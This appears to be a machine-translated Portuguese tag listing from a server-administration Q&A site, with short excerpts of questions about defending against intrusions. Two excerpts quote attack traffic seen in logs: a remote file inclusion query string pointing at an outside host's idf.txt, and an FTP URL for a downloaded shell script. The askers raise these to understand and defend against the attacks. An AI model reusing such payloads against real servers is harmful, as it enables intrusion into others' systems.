Perguntas sobre 'hacking'

Tags
Perguntas sobre defesa ou recuperação de hackers mal-intencionados. Não oferecemos suporte a hackers, portanto, perguntas sobre a realização desses hacks não são permitidas aqui.
3
respostas

A instância do Amazon EC2 possivelmente comprometida

Eu tenho uma instância do EC2 que pode ter sido comprometida. A instância responde muito lentamente desde a semana passada e recentemente eu verifiquei o httpd access_logs e eles estão em excesso de 11Gigs, apesar de abrir a instância do EC2 ape...
18.04.2011 / 06:01
1
resposta

Meu site está sendo importado por “cross_site_scripting.nasl”. Sobre o que é isso?

Meu site está lançando grandes lotes de mensagens de "links quebrados". Eu suponho que estou sendo investigado por uma vulnerabilidade específica. Eu quero saber o que o criminoso está procurando, como esperam que ele funcione, seja diretamen...
02.11.2010 / 01:02
1
resposta

existe algum motivo válido para os usuários solicitarem phpinfo ()

Estou trabalhando em escrever um conjunto de regras para o fail2ban para tornar a vida um pouco mais interessante para quem quer que esteja tentando forçar sua entrada no meu sistema. Uma boa maioria das tentativas tendem a girar em torno de ten...
20.03.2010 / 11:07
1
resposta

Devo suspeitar dessa querystring?

Eu notei no meu log de eventos do aplicativo alguns erros: Exception message: A potentially dangerous Request.QueryString value was detected from the client (term="DTİNST32") Request URL: http://domain.com/url.aspx?term=DTNT A...
07.03.2010 / 02:58
1
resposta

Descriptografando pacotes ESP com modo de transporte IPSEC se a chave pré-compartilhada for conhecida

Estou lendo sobre o IPSec e queria saber se eu poderia usar o wireshark para descriptografar pacotes ESP de sessões de modo de transporte IPSEC que estão usando uma chave pré-compartilhada. Ao ler este tópico , concluí que, mesmo que a chave pr...
12.11.2009 / 14:10
2
respostas

Proprietário e permissões em um arquivo invadido versus em um arquivo “legal”

Isso está relacionado a um incidente de hackers com o qual tivemos de lidar. Os hackers inseriram um arquivo php em nosso sistema. O diretório em questão recebe uploads (imagens) do nosso cmsadmin. No entanto, todos os arquivos enviados através...
20.07.2010 / 17:22
3
respostas

As chaves de registro podem ser alteradas por meio de URLs do servidor da web?

Então, eu estava navegando pelos logs de acesso ao meu site recentemente e notei várias tentativas de fazer coisas como essa ?page=pics//?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr//skin_shop/.../cms/idf.txt?? Claro, eu não sou compl...
31.07.2009 / 10:51
0
respostas

Strange hack tentam postfix

Ontem recebi um email {@DOMAIN.ORG enviado do meu servidor de email que o email foi marcado como spam. O corpo incluiu comandos de download de scripts, como ftp://ftp.ugotownedz.org/upfile2.sh linhas do syslog Aug 14 19:25:00 hoesch...
15.08.2016 / 10:25
2
respostas

Os sites são invadidos por página de estacionamento

Desde algumas semanas, os sites da minha hospedagem são invadidos por uma página de estacionamento de hospedagem ao solicitá-los. Às vezes, ele mostra meu website real, mas alguns minutos depois de solicitá-lo, quando eu revisito meu site, el...
07.04.2012 / 13:59
3
respostas

Descubra o alcance de IP da LAN, a máscara de rede e o gateway?

Se eu estiver conectado a uma rede sem DHCP e sem hosts 'sample' acessíveis, onde posso ver as configurações. Como faço para descobrir / adivinhar o alcance de IPs da rede, netmask? Endereço IP do gateway? P.S. Não sugira bruteforcing 192.168...
24.02.2011 / 22:21